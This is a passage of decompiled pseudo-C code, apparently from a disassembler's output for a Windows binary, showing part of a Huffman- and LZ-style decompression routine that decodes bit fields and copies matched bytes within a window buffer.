                                                                                              																			_t865 =  *((intOrPtr*)(_t936 + 0x4b34));
                                                                                              																			_t683 = _t865 + _t570;
                                                                                              																			_t571 = _v16;
                                                                                              																			_t852 = _t865 + _t734;
                                                                                              																			_v8 = _t852;
                                                                                              																			 *(_t936 + 0x70) = _t734 + _t571;
                                                                                              																			__eflags = _v12 - _t571;
                                                                                              																			if(_v12 >= _t571) {
                                                                                              																				__eflags = _t571 - 8;
                                                                                              																				if(_t571 < 8) {
                                                                                              																					L200:
                                                                                              																					__eflags = _a4;
                                                                                              																					if(_a4 > 0) {
                                                                                              																						__eflags = _a4 - 1;
                                                                                              																						_t740 = _v8;
                                                                                              																						 *_t740 =  *_t683;
                                                                                              																						if(_a4 > 1) {
                                                                                              																							__eflags = _a4 - 2;
                                                                                              																							 *((char*)(_t740 + 1)) =  *((intOrPtr*)(_t683 + 1));
                                                                                              																							if(_a4 > 2) {
                                                                                              																								__eflags = _a4 - 3;
                                                                                              																								 *((char*)(_t740 + 2)) =  *((intOrPtr*)(_t683 + 2));
                                                                                              																								if(_a4 > 3) {
                                                                                              																									__eflags = _a4 - 4;
                                                                                              																									 *((char*)(_t740 + 3)) =  *((intOrPtr*)(_t683 + 3));
                                                                                              																									if(_a4 > 4) {
                                                                                              																										__eflags = _a4 - 5;
                                                                                              																										 *((char*)(_t740 + 4)) =  *((intOrPtr*)(_t683 + 4));
                                                                                              																										if(_a4 > 5) {
                                                                                              																											__eflags = _a4 - 6;
                                                                                              																											 *((char*)(_t740 + 5)) =  *((intOrPtr*)(_t683 + 5));
                                                                                              																											if(_a4 > 6) {
                                                                                              																												 *((char*)(_t740 + 6)) =  *((intOrPtr*)(_t683 + 6));
                                                                                              																											}
                                                                                              																										}
                                                                                              																									}
                                                                                              																								}
                                                                                              																							}
                                                                                              																						}
                                                                                              																					}
                                                                                              																					continue;
                                                                                              																				}
                                                                                              																				_t580 = _v16 >> 3;
                                                                                              																				__eflags = _t580;
                                                                                              																				_v16 = _t580;
                                                                                              																				do {
                                                                                              																					E0041C290(_t683, _t934, _t936, _v8, _t683, 8);
                                                                                              																					_v8 = _v8 + 8;
                                                                                              																					_a4 = _a4 - 8;
                                                                                              																					_t937 = _t937 + 0xc;
                                                                                              																					_t683 = _t683 + 8;
                                                                                              																					_t467 =  &_v16;
                                                                                              																					 *_t467 = _v16 - 1;
                                                                                              																					__eflags =  *_t467;
                                                                                              																				} while ( *_t467 != 0);
                                                                                              																				goto L200;
                                                                                              																			}
                                                                                              																			__eflags = _t571 - 8;
                                                                                              																			if(_t571 < 8) {
                                                                                              																				goto L200;
                                                                                              																			}
                                                                                              																			_t582 = _t571 >> 3;
                                                                                              																			__eflags = _t582;
                                                                                              																			_t741 = _t582;
                                                                                              																			_t583 = _t852;
                                                                                              																			do {
                                                                                              																				_a4 = _a4 - 8;
                                                                                              																				 *_t583 =  *_t683;
                                                                                              																				 *((char*)(_t583 + 1)) =  *((intOrPtr*)(_t683 + 1));
                                                                                              																				 *((char*)(_t583 + 2)) =  *((intOrPtr*)(_t683 + 2));
                                                                                              																				 *((char*)(_t583 + 3)) =  *((intOrPtr*)(_t683 + 3));
                                                                                              																				 *((char*)(_t583 + 4)) =  *((intOrPtr*)(_t683 + 4));
                                                                                              																				 *((char*)(_t583 + 5)) =  *((intOrPtr*)(_t683 + 5));
                                                                                              																				 *((char*)(_t583 + 6)) =  *((intOrPtr*)(_t683 + 6));
                                                                                              																				_t852 =  *((intOrPtr*)(_t683 + 7));
                                                                                              																				 *((char*)(_t583 + 7)) =  *((intOrPtr*)(_t683 + 7));
                                                                                              																				_t683 = _t683 + 8;
                                                                                              																				_t583 = _t583 + 8;
                                                                                              																				_t741 = _t741 - 1;
                                                                                              																				__eflags = _t741;
                                                                                              																			} while (_t741 != 0);
                                                                                              																			_v8 = _t583;
                                                                                              																			goto L200;
                                                                                              																		}
                                                                                              																	}
                                                                                              																	_t747 = _t936 + 0x2d5c + _t689 * 4;
                                                                                              																	while(1) {
                                                                                              																		__eflags = _t563 -  *_t747;
                                                                                              																		if(_t563 <  *_t747) {
                                                                                              																			break;
                                                                                              																		}
                                                                                              																		_t689 = _t689 + 1;
                                                                                              																		_t747 = _t747 + 4;
                                                                                              																		__eflags = _t689 - 0xf;
                                                                                              																		if(_t689 < 0xf) {
                                                                                              																			continue;
                                                                                              																		}
                                                                                              																		goto L185;
                                                                                              																	}
                                                                                              																	_t860 = _t689;
                                                                                              																	goto L185;
                                                                                              																}
                                                                                              																_t748 = 0x10;
                                                                                              																_t589 = _t563 >> _t748 - _t688;
                                                                                              																_t751 = ( *(_t589 + _t936 + 0x2de0) & 0x000000ff) +  *(_t934 + 4);
                                                                                              																 *_t934 =  *_t934 + (_t751 >> 3);
                                                                                              																 *(_t934 + 4) = _t751 & 0x00000007;
                                                                                              																_t567 =  *(_t936 + 0x31e0 + _t589 * 2) & 0x0000ffff;
                                                                                              																goto L188;
                                                                                              															}
                                                                                              															_t590 =  *(_t936 + 0x68);
                                                                                              															__eflags = _t590;
                                                                                              															if(_t590 == 0) {
                                                                                              																continue;
                                                                                              															}
                                                                                              															_t753 =  *(_t936 + 0x70);
                                                                                              															_a4 = _t590;
                                                                                              															_t592 = _t753 -  *(_t936 + 0x54);
                                                                                              															_t852 =  *((intOrPtr*)(_t936 + 0xe6d8)) + 0xffffefff;
                                                                                              															__eflags = _t592 - _t852;
                                                                                              															if(_t592 >= _t852) {
                                                                                              																L169:
                                                                                              																__eflags = _a4;
                                                                                              																if(_a4 <= 0) {
                                                                                              																	continue;
                                                                                              																}
                                                                                              																_t877 =  *(_t936 + 0xe6dc);
                                                                                              																do {
                                                                                              																	_t683 =  *(_t936 + 0x70);
                                                                                              																	_a4 = _a4 - 1;
                                                                                              																	 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t877 & _t592) +  *((intOrPtr*)(_t936 + 0x4b34))));
                                                                                              																	_t877 =  *(_t936 + 0xe6dc);
                                                                                              																	_t592 = _t592 + 1;
                                                                                              																	__eflags = _a4;
                                                                                              																	 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t877;
                                                                                              																} while (_a4 > 0);
                                                                                              																continue;
                                                                                              															}
                                                                                              															__eflags = _t753 - _t852;
                                                                                              															if(_t753 >= _t852) {
                                                                                              																goto L169;
                                                                                              															}
                                                                                              															_t880 =  *((intOrPtr*)(_t936 + 0x4b34));
                                                                                              															_t683 = _t880 + _t592;
                                                                                              															_t593 = _a4;
                                                                                              															_t852 = _t880 + _t753;
                                                                                              															_v12 = _t852;
                                                                                              															 *(_t936 + 0x70) = _t753 + _t593;
                                                                                              															__eflags =  *(_t936 + 0x54) - _t593;
                                                                                              															if( *(_t936 + 0x54) >= _t593) {
                                                                                              																__eflags = _t593 - 8;
                                                                                              																if(_t593 < 8) {
                                                                                              																	L146:
                                                                                              																	_t759 = _a4;
                                                                                              																	__eflags = _t759;
                                                                                              																	if(_t759 <= 0) {
                                                                                              																		continue;
                                                                                              																	}
                                                                                              																	_t594 = _v12;
                                                                                              																	L53:
                                                                                              																	_t852 =  *_t683;
                                                                                              																	 *_t594 =  *_t683;
                                                                                              																	__eflags = _t759 - 1;
                                                                                              																	if(_t759 > 1) {
                                                                                              																		_t852 =  *((intOrPtr*)(_t683 + 1));
                                                                                              																		 *((char*)(_t594 + 1)) =  *((intOrPtr*)(_t683 + 1));
                                                                                              																		__eflags = _t759 - 2;
                                                                                              																		if(_t759 > 2) {
                                                                                              																			_t852 =  *((intOrPtr*)(_t683 + 2));
                                                                                              																			 *((char*)(_t594 + 2)) =  *((intOrPtr*)(_t683 + 2));
                                                                                              																			__eflags = _t759 - 3;
                                                                                              																			if(_t759 > 3) {
                                                                                              																				_t852 =  *((intOrPtr*)(_t683 + 3));
                                                                                              																				 *((char*)(_t594 + 3)) =  *((intOrPtr*)(_t683 + 3));
                                                                                              																				__eflags = _t759 - 4;
                                                                                              																				if(_t759 > 4) {
                                                                                              																					_t852 =  *((intOrPtr*)(_t683 + 4));
                                                                                              																					 *((char*)(_t594 + 4)) =  *((intOrPtr*)(_t683 + 4));
                                                                                              																					__eflags = _t759 - 5;
                                                                                              																					if(_t759 > 5) {
                                                                                              																						_t852 =  *((intOrPtr*)(_t683 + 5));
                                                                                              																						 *((char*)(_t594 + 5)) =  *((intOrPtr*)(_t683 + 5));
                                                                                              																						__eflags = _t759 - 6;
                                                                                              																						if(_t759 > 6) {
                                                                                              																							 *((char*)(_t594 + 6)) =  *((intOrPtr*)(_t683 + 6));
                                                                                              																						}
                                                                                              																					}
                                                                                              																				}
                                                                                              																			}
                                                                                              																		}
                                                                                              																	}
                                                                                              																	continue;
                                                                                              																}
                                                                                              																_t595 = _t593 >> 3;
                                                                                              																__eflags = _t595;
                                                                                              																_v16 = _t595;
                                                                                              																do {
                                                                                              																	E0041C290(_t683, _t934, _t936, _v12, _t683, 8);
                                                                                              																	_v12 = _v12 + 8;
                                                                                              																	_a4 = _a4 - 8;
                                                                                              																	_t937 = _t937 + 0xc;
                                                                                              																	_t683 = _t683 + 8;
                                                                                              																	_t377 =  &_v16;
                                                                                              																	 *_t377 = _v16 - 1;
                                                                                              																	__eflags =  *_t377;
                                                                                              																} while ( *_t377 != 0);
                                                                                              																goto L146;
                                                                                              															}
                                                                                              															__eflags = _t593 - 8;
                                                                                              															if(_t593 < 8) {
                                                                                              																goto L146;
                                                                                              															}
                                                                                              															_t762 = _t593 >> 3;
                                                                                              															__eflags = _t762;
                                                                                              															_t597 = _t852;
                                                                                              															do {
                                                                                              																_a4 = _a4 - 8;
                                                                                              																 *_t597 =  *_t683;
                                                                                              																 *((char*)(_t597 + 1)) =  *((intOrPtr*)(_t683 + 1));
                                                                                              																 *((char*)(_t597 + 2)) =  *((intOrPtr*)(_t683 + 2));
                                                                                              																 *((char*)(_t597 + 3)) =  *((intOrPtr*)(_t683 + 3));
                                                                                              																 *((char*)(_t597 + 4)) =  *((intOrPtr*)(_t683 + 4));
                                                                                              																 *((char*)(_t597 + 5)) =  *((intOrPtr*)(_t683 + 5));
                                                                                              																 *((char*)(_t597 + 6)) =  *((intOrPtr*)(_t683 + 6));
                                                                                              																_t852 =  *((intOrPtr*)(_t683 + 7));
                                                                                              																 *((char*)(_t597 + 7)) =  *((intOrPtr*)(_t683 + 7));
                                                                                              																_t683 = _t683 + 8;
                                                                                              																_t597 = _t597 + 8;
                                                                                              																_t762 = _t762 - 1;
                                                                                              																__eflags = _t762;
                                                                                              															} while (_t762 != 0);
                                                                                              															L142:
                                                                                              															_v12 = _t597;
                                                                                              															goto L146;
                                                                                              														}
                                                                                              														_t598 = E00417B97(_t936, _t852, __eflags);
                                                                                              														L25:
                                                                                              														if(_t598 != 0) {
                                                                                              															continue;
                                                                                              														} else {
                                                                                              															break;
                                                                                              														}
                                                                                              													}
                                                                                              													_t598 = E00414F0A(_t936, __eflags);
                                                                                              													goto L25;
                                                                                              												}
                                                                                              												_t601 =  *(_t545 + 0x430089) & 0x000000ff;
                                                                                              												_t695 = ( *(_t545 + 0x4300a5) & 0x000000ff) + 3;
                                                                                              												_v8 = _t695;
                                                                                              												_a4 = _t601;
                                                                                              												__eflags = _t601;
                                                                                              												if(_t601 > 0) {
                                                                                              													_t639 = E0040978C(_t934);
                                                                                              													_t809 = 0x10;
                                                                                              													_t642 =  *(_t934 + 4) + _a4;
                                                                                              													_v8 = _t695 + (_t639 >> _t809 - _a4);
                                                                                              													 *_t934 =  *_t934 + (_t642 >> 3);
                                                                                              													_t643 = _t642 & 0x00000007;
                                                                                              													__eflags = _t643;
                                                                                              													 *(_t934 + 4) = _t643;
                                                                                              												}
                                                                                              												_t602 = E0040978C(_t934);
                                                                                              												_t696 =  *(_t936 + 0x1004);
                                                                                              												_t603 = _t602 & 0x0000fffe;
                                                                                              												__eflags = _t603 -  *((intOrPtr*)(_t936 + 0xf84 + _t696 * 4));
                                                                                              												if(_t603 >=  *((intOrPtr*)(_t936 + 0xf84 + _t696 * 4))) {
                                                                                              													_t888 = 0xf;
                                                                                              													_t766 = _t696 + 1;
                                                                                              													__eflags = _t766 - _t888;
                                                                                              													if(_t766 >= _t888) {
                                                                                              														L107:
                                                                                              														_t768 =  *(_t934 + 4) + _t888;
                                                                                              														 *(_t934 + 4) = _t768 & 0x00000007;
                                                                                              														 *_t934 =  *_t934 + (_t768 >> 3);
                                                                                              														_t770 = 0x10;
                                                                                              														_t606 = (_t603 -  *((intOrPtr*)(_t936 + 0xf80 + _t888 * 4)) >> _t770 - _t888) +  *((intOrPtr*)(_t936 + 0xfc4 + _t888 * 4));
                                                                                              														__eflags = _t606 -  *((intOrPtr*)(_t936 + 0xf80));
                                                                                              														if(_t606 >=  *((intOrPtr*)(_t936 + 0xf80))) {
                                                                                              															_t606 = 0;
                                                                                              															__eflags = 0;
                                                                                              														}
                                                                                              														_t607 =  *(_t936 + 0x1c08 + _t606 * 2) & 0x0000ffff;
                                                                                              														goto L110;
                                                                                              													}
                                                                                              													_t700 = _t936 + 0xf84 + _t766 * 4;
                                                                                              													while(1) {
                                                                                              														__eflags = _t603 -  *_t700;
                                                                                              														if(_t603 <  *_t700) {
                                                                                              															break;
                                                                                              														}
                                                                                              														_t766 = _t766 + 1;
                                                                                              														_t700 = _t700 + 4;
                                                                                              														__eflags = _t766 - 0xf;
                                                                                              														if(_t766 < 0xf) {
                                                                                              															continue;
                                                                                              														}
                                                                                              														goto L107;
                                                                                              													}
                                                                                              													_t888 = _t766;
                                                                                              													goto L107;
                                                                                              												} else {
                                                                                              													_t803 = 0x10;
                                                                                              													_t638 = _t603 >> _t803 - _t696;
                                                                                              													_t806 = ( *(_t638 + _t936 + 0x1008) & 0x000000ff) +  *(_t934 + 4);
                                                                                              													 *_t934 =  *_t934 + (_t806 >> 3);
                                                                                              													 *(_t934 + 4) = _t806 & 0x00000007;
                                                                                              													_t607 =  *(_t936 + 0x1408 + _t638 * 2) & 0x0000ffff;
                                                                                              													L110:
                                                                                              													_t772 =  *(_t607 + 0x44f6b8) & 0x000000ff;
                                                                                              													_t683 =  *((intOrPtr*)(0x44f6f8 + _t607 * 4)) + 1;
                                                                                              													_v16 = _t683;
                                                                                              													_a4 = _t772;
                                                                                              													__eflags = _t772;
                                                                                              													if(_t772 <= 0) {
                                                                                              														L133:
                                                                                              														__eflags = _t683 - 0x2000;
                                                                                              														if(_t683 >= 0x2000) {
                                                                                              															_v8 = _v8 + 1;
                                                                                              															__eflags = _t683 - 0x40000;
                                                                                              															if(_t683 >= 0x40000) {
                                                                                              																_t281 =  &_v8;
                                                                                              																 *_t281 = _v8 + 1;
                                                                                              																__eflags =  *_t281;
                                                                                              															}
                                                                                              														}
                                                                                              														_t773 =  *(_t936 + 0x70);
                                                                                              														 *(_t936 + 0x60) =  *(_t936 + 0x5c);
                                                                                              														 *(_t936 + 0x5c) =  *(_t936 + 0x58);
                                                                                              														 *(_t936 + 0x58) =  *(_t936 + 0x54);
                                                                                              														_t611 = _v8;
                                                                                              														 *(_t936 + 0x68) = _t611;
                                                                                              														_a4 = _t611;
                                                                                              														_t613 = _t773 - _t683;
                                                                                              														_t852 =  *((intOrPtr*)(_t936 + 0xe6d8)) + 0xffffefff;
                                                                                              														 *(_t936 + 0x54) = _t683;
                                                                                              														__eflags = _t613 - _t852;
                                                                                              														if(_t613 >= _t852) {
                                                                                              															L148:
                                                                                              															__eflags = _v8;
                                                                                              															if(_v8 <= 0) {
                                                                                              																continue;
                                                                                              															}
                                                                                              															_t890 =  *(_t936 + 0xe6dc);
                                                                                              															do {
                                                                                              																_t683 =  *(_t936 + 0x70);
                                                                                              																_a4 = _a4 - 1;
                                                                                              																 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t890 & _t613) +  *((intOrPtr*)(_t936 + 0x4b34))));
                                                                                              																_t890 =  *(_t936 + 0xe6dc);
                                                                                              																_t613 = _t613 + 1;
                                                                                              																__eflags = _a4;
                                                                                              																 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t890;
                                                                                              															} while (_a4 > 0);
                                                                                              															continue;
                                                                                              														} else {
                                                                                              															__eflags = _t773 - _t852;
                                                                                              															if(_t773 >= _t852) {
                                                                                              																goto L148;
                                                                                              															}
                                                                                              															_t893 =  *((intOrPtr*)(_t936 + 0x4b34));
                                                                                              															_t683 = _t893 + _t613;
                                                                                              															_t614 = _v8;
                                                                                              															_t852 = _t893 + _t773;
                                                                                              															_v12 = _t852;
                                                                                              															 *(_t936 + 0x70) = _t773 + _t614;
                                                                                              															__eflags = _v16 - _t614;
                                                                                              															if(_v16 >= _t614) {
                                                                                              																__eflags = _t614 - 8;
                                                                                              																if(_t614 < 8) {
                                                                                              																	goto L146;
                                                                                              																}
                                                                                              																_t616 = _v8 >> 3;
                                                                                              																__eflags = _t616;
                                                                                              																_v16 = _t616;
                                                                                              																do {
                                                                                              																	E0041C290(_t683, _t934, _t936, _v12, _t683, 8);
                                                                                              																	_v12 = _v12 + 8;
                                                                                              																	_a4 = _a4 - 8;
                                                                                              																	_t937 = _t937 + 0xc;
                                                                                              																	_t683 = _t683 + 8;
                                                                                              																	_t328 =  &_v16;
                                                                                              																	 *_t328 = _v16 - 1;
                                                                                              																	__eflags =  *_t328;
                                                                                              																} while ( *_t328 != 0);
                                                                                              																goto L146;
                                                                                              															}
                                                                                              															_t779 = 8;
                                                                                              															__eflags = _t614 - _t779;
                                                                                              															if(_t614 < _t779) {
                                                                                              																goto L146;
                                                                                              															}
                                                                                              															_t618 = _t614 >> 3;
                                                                                              															__eflags = _t618;
                                                                                              															_v16 = _t618;
                                                                                              															_t619 = _t852;
                                                                                              															do {
                                                                                              																_a4 = _a4 - _t779;
                                                                                              																 *_t619 =  *_t683;
                                                                                              																 *((char*)(_t619 + 1)) =  *((intOrPtr*)(_t683 + 1));
                                                                                              																 *((char*)(_t619 + 2)) =  *((intOrPtr*)(_t683 + 2));
                                                                                              																 *((char*)(_t619 + 3)) =  *((intOrPtr*)(_t683 + 3));
                                                                                              																 *((char*)(_t619 + 4)) =  *((intOrPtr*)(_t683 + 4));
                                                                                              																 *((char*)(_t619 + 5)) =  *((intOrPtr*)(_t683 + 5));
                                                                                              																 *((char*)(_t619 + 6)) =  *((intOrPtr*)(_t683 + 6));
                                                                                              																_t852 =  *((intOrPtr*)(_t683 + 7));
                                                                                              																 *((char*)(_t619 + 7)) =  *((intOrPtr*)(_t683 + 7));
                                                                                              																_t683 = _t683 + _t779;
                                                                                              																_t619 = _t619 + _t779;
                                                                                              																_t318 =  &_v16;
                                                                                              																 *_t318 = _v16 - 1;
                                                                                              																__eflags =  *_t318;
                                                                                              															} while ( *_t318 != 0);
                                                                                              															goto L142;
                                                                                              														}
                                                                                              													}
                                                                                              													__eflags = _t607 - 9;
                                                                                              													if(_t607 <= 9) {
                                                                                              														_t620 = E0040978C(_t934);
                                                                                              														_t781 = 0x10;
                                                                                              														_t683 = _t683 + (_t620 >> _t781 - _a4);
                                                                                              														_t623 =  *(_t934 + 4) + _a4;
                                                                                              														 *_t934 =  *_t934 + (_t623 >> 3);
                                                                                              														_t624 = _t623 & 0x00000007;
                                                                                              														__eflags = _t624;
                                                                                              														 *(_t934 + 4) = _t624;
                                                                                              														L132:
                                                                                              														_v16 = _t683;
                                                                                              														goto L133;
                                                                                              													}
                                                                                              													__eflags = _t772 - 4;
                                                                                              													if(_t772 > 4) {
                                                                                              														_t634 = E0040978C(_t934);
                                                                                              														_t635 = _a4;
                                                                                              														_t798 = 0x14;
                                                                                              														_t636 =  *(_t934 + 4) + _t635 - 4;
                                                                                              														 *_t934 =  *_t934 + (_t636 >> 3);
                                                                                              														_t683 = _t683 + (_t634 >> _t798 - _t635 << 4);
                                                                                              														_t637 = _t636 & 0x00000007;
                                                                                              														__eflags = _t637;
                                                                                              														 *(_t934 + 4) = _t637;
                                                                                              													}
                                                                                              													_t625 =  *(_t936 + 0x98cc);
                                                                                              													__eflags = _t625;
                                                                                              													if(_t625 <= 0) {
                                                                                              														_t626 = E0040978C(_t934);
                                                                                              														_t901 =  *(_t936 + 0x1ef0);
                                                                                              														_t627 = _t626 & 0x0000fffe;
                                                                                              														__eflags = _t627 -  *((intOrPtr*)(_t936 + 0x1e70 + _t901 * 4));
                                                                                              														if(_t627 >=  *((intOrPtr*)(_t936 + 0x1e70 + _t901 * 4))) {
                                                                                              															_t902 = _t901 + 1;
                                                                                              															_a4 = 0xf;
                                                                                              															__eflags = _t902 - 0xf;
                                                                                              															if(_t902 >= 0xf) {
                                                                                              																L125:
                                                                                              																_t787 =  *(_t934 + 4) + _a4;
                                                                                              																 *_t934 =  *_t934 + (_t787 >> 3);
                                                                                              																_t905 = _a4;
                                                                                              																 *(_t934 + 4) = _t787 & 0x00000007;
                                                                                              																_t789 = 0x10;
                                                                                              																_t630 = (_t627 -  *((intOrPtr*)(_t936 + 0x1e6c + _a4 * 4)) >> _t789 - _a4) +  *((intOrPtr*)(_t936 + 0x1eb0 + _t905 * 4));
                                                                                              																__eflags = _t630 -  *((intOrPtr*)(_t936 + 0x1e6c));
                                                                                              																if(_t630 >=  *((intOrPtr*)(_t936 + 0x1e6c))) {
                                                                                              																	_t630 = 0;
                                                                                              																	__eflags = 0;
                                                                                              																}
                                                                                              																_t631 =  *(_t936 + 0x2af4 + _t630 * 2) & 0x0000ffff;
                                                                                              																L128:
                                                                                              																__eflags = _t631 - 0x10;
                                                                                              																if(_t631 != 0x10) {
                                                                                              																	_t683 = _t683 + _t631;
                                                                                              																	 *(_t936 + 0x98c8) = _t631;
                                                                                              																	goto L132;
                                                                                              																}
                                                                                              																 *(_t936 + 0x98cc) = 0xf;
                                                                                              																goto L116;
                                                                                              															}
                                                                                              															_t791 = _t936 + 0x1e70 + _t902 * 4;
                                                                                              															while(1) {
                                                                                              																__eflags = _t627 -  *_t791;
                                                                                              																if(_t627 <  *_t791) {
                                                                                              																	break;
                                                                                              																}
                                                                                              																_t902 = _t902 + 1;
                                                                                              																_t791 = _t791 + 4;
                                                                                              																__eflags = _t902 - 0xf;
                                                                                              																if(_t902 < 0xf) {
                                                                                              																	continue;
                                                                                              																}
                                                                                              																goto L125;
                                                                                              															}
                                                                                              															_a4 = _t902;
                                                                                              															goto L125;
                                                                                              														}
                                                                                              														_t792 = 0x10;
                                                                                              														_t632 = _t627 >> _t792 - _t901;
                                                                                              														_t795 = ( *(_t632 + _t936 + 0x1ef4) & 0x000000ff) +  *(_t934 + 4);
                                                                                              														 *_t934 =  *_t934 + (_t795 >> 3);
                                                                                              														 *(_t934 + 4) = _t795 & 0x00000007;
                                                                                              														_t631 =  *(_t936 + 0x22f4 + _t632 * 2) & 0x0000ffff;
                                                                                              														goto L128;
                                                                                              													} else {
                                                                                              														_t633 = _t625 - 1;
                                                                                              														__eflags = _t633;
                                                                                              														 *(_t936 + 0x98cc) = _t633;
                                                                                              														L116:
                                                                                              														_t683 = _t683 +  *(_t936 + 0x98c8);
                                                                                              														goto L132;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              											_t852 =  *(_t936 + 0x70);
                                                                                              											 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) = _t545;
                                                                                              											L95:
                                                                                              											 *(_t936 + 0x70) =  *(_t936 + 0x70) + 1;
                                                                                              											continue;
                                                                                              										}
                                                                                              										_t702 = _t936 + 0x98 + _t706 * 4;
                                                                                              										while(1) {
                                                                                              											__eflags = _t541 -  *_t702;
                                                                                              											if(_t541 <  *_t702) {
                                                                                              												break;
                                                                                              											}
                                                                                              											_t706 = _t706 + 1;
                                                                                              											_t702 = _t702 + 4;
                                                                                              											__eflags = _t706 - 0xf;
                                                                                              											if(_t706 < 0xf) {
                                                                                              												continue;
                                                                                              											}
                                                                                              											goto L90;
                                                                                              										}
                                                                                              										_t852 = _t706;
                                                                                              										goto L90;
                                                                                              									}
                                                                                              									_t814 = 0x10;
                                                                                              									_t644 = _t541 >> _t814 - _t681;
                                                                                              									_t817 = ( *(_t644 + _t936 + 0x11c) & 0x000000ff) +  *(_t934 + 4);
                                                                                              									_t852 = _t817 >> 3;
                                                                                              									 *_t934 =  *_t934 + (_t817 >> 3);
                                                                                              									 *(_t934 + 4) = _t817 & 0x00000007;
                                                                                              									_t545 =  *(_t936 + 0x51c + _t644 * 2) & 0x0000ffff;
                                                                                              									goto L93;
                                                                                              								}
                                                                                              								_t683 = E00413B29(_t936 + 0x98d0);
                                                                                              								if(_t683 == 0xffffffff) {
                                                                                              									E00413A60(_t936 + 0x98d0, _t852);
                                                                                              									_t535 = _t936 + 0xe654;
                                                                                              									 *_t535 =  *(_t936 + 0xe654) & 0x00000000;
                                                                                              									__eflags =  *_t535;
                                                                                              									break;
                                                                                              								}
                                                                                              								if(_t683 !=  *((intOrPtr*)(_t936 + 0xe4bc))) {
                                                                                              									L81:
                                                                                              									 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) = _t683;
                                                                                              									goto L95;
                                                                                              								}
                                                                                              								_t648 = E00413E39(_t936);
                                                                                              								if(_t648 != 0) {
                                                                                              									__eflags = _t648 - 0xffffffff;
                                                                                              									if(_t648 == 0xffffffff) {
                                                                                              										break;
                                                                                              									}
                                                                                              									__eflags = _t648 - 2;
                                                                                              									if(_t648 == 2) {
                                                                                              										break;
                                                                                              									}
                                                                                              									__eflags = _t648 - 3;
                                                                                              									if(__eflags != 0) {
                                                                                              										__eflags = _t648 - 4;
                                                                                              										if(_t648 != 4) {
                                                                                              											__eflags = _t648 - 5;
                                                                                              											if(_t648 != 5) {
                                                                                              												goto L81;
                                                                                              											}
                                                                                              											_t649 = E00413E39(_t936);
                                                                                              											__eflags = _t649 - 0xffffffff;
                                                                                              											if(_t649 == 0xffffffff) {
                                                                                              												break;
                                                                                              											}
                                                                                              											_a4 = _t649 + 4;
                                                                                              											_t651 =  *(_t936 + 0x70);
                                                                                              											_t852 = _t651 - 1;
                                                                                              											_t825 =  *((intOrPtr*)(_t936 + 0xe6d8)) + 0xffffefff;
                                                                                              											__eflags = _t852 - _t825;
                                                                                              											if(_t852 >= _t825) {
                                                                                              												L77:
                                                                                              												__eflags = _a4;
                                                                                              												if(_a4 <= 0) {
                                                                                              													continue;
                                                                                              												}
                                                                                              												_t826 =  *(_t936 + 0xe6dc);
                                                                                              												do {
                                                                                              													_t683 =  *(_t936 + 0x70);
                                                                                              													_a4 = _a4 - 1;
                                                                                              													 *( *((intOrPtr*)(_t936 + 0x4b34)) +  *(_t936 + 0x70)) =  *((intOrPtr*)((_t826 & _t852) +  *((intOrPtr*)(_t936 + 0x4b34))));
                                                                                              													_t826 =  *(_t936 + 0xe6dc);
                                                                                              													_t852 = _t852 + 1;
                                                                                              													__eflags = _a4;
                                                                                              													 *(_t936 + 0x70) =  *(_t936 + 0x70) + 0x00000001 & _t826;
                                                                                              												} while (_a4 > 0);
                                                                                              												continue;
                                                                                              											}
                                                                                              											__eflags = _t651 - _t825;
                                                                                              											if(_t651 >= _t825) {
                                                                                              												goto L77;
                                                                                              											}
                                                                                              											_t829 =  *((intOrPtr*)(_t936 + 0x4b34));
                                                                                              											_t683 = _t829 + _t852;
                                                                                              											_v8 = _t829 + _t651;
                                                                                              											_t831 = _a4;
                                                                                              											 *(_t936 + 0x70) = _t651 + _t831;
                                                                                              											__eflags = _t831 - 1;
                                                                                              											if(_t831 <= 1) {
                                                                                              												__eflags = _t831 - 8;
                                                                                              												if(_t831 < 8) {
                                                                                              													goto L51;
                                                                                              												}
                                                                                              												_t658 = _a4 >> 3;
                                                                                              												__eflags = _t658;
                                                                                              												_v16 = _t658;
                                                                                              												do {
                                                                                              													E0041C290(_t683, _t934, _t936, _v8, _t683, 8);
                                                                                              													_v8 = _v8 + 8;
                                                                                              													_a4 = _a4 - 8;
                                                                                              													_t937 = _t937 + 0xc;
                                                                                              													_t683 = _t683 + 8;
                                                                                              													_t144 =  &_v16;
                                                                                              													 *_t144 = _v16 - 1;
                                                                                              													__eflags =  *_t144;
                                                                                              												} while ( *_t144 != 0);
                                                                                              												goto L51;
                                                                                              											}
                                                                                              											__eflags = _t831 - 8;
                                                                                              											if(_t831 < 8) {
                                                                                              												goto L51;
                                                                                              											}
                                                                                              											_t660 = _v8;
                                                                                              											_t832 = _t831 >> 3;
                                                                                              											__eflags = _t832;
                                                                                              											do {
                                                                                              												_a4 = _a4 - 8;
                                                                                              												 *_t660 =  *_t683;
                                                                                              												 *((char*)(_t660 + 1)) =  *((intOrPtr*)(_t683 + 1));
                                                                                              												 *((char*)(_t660 + 2)) =  *((intOrPtr*)(_t683 + 2));
                                                                                              												 *((char*)(_t660 + 3)) =  *((intOrPtr*)(_t683 + 3));
                                                                                              												 *((char*)(_t660 + 4)) =  *((intOrPtr*)(_t683 + 4));
                                                                                              												 *((char*)(_t660 + 5)) =  *((intOrPtr*)(_t683 + 5));
                                                                                              												 *((char*)(_t660 + 6)) =  *((intOrPtr*)(_t683 + 6));
                                                                                              												_t852 =  *((intOrPtr*)(_t683 + 7));
                                                                                              												 *((char*)(_t660 + 7)) =  *((intOrPtr*)(_t683 + 7));
                                                                                              												_t683 = _t683 + 8;
                                                                                              												_t660 = _t660 + 8;
                                                                                              												_t832 = _t832 - 1;
                                                                                              												__eflags = _t832;
                                                                                              											} while (_t832 != 0);
                                                                                              											goto L47;
                                                                                              										} else {
                                                                                              											_t684 = 0;
                                                                                              											__eflags = 0;
                                                                                              											_a7 = 0;
                                                                                              											_v16 = 0;
                                                                                              											while(1) {
                                                                                              												__eflags = _a7;
                                                                                              												if(_a7 != 0) {
                                                                                              													goto L223;
                                                                                              												}
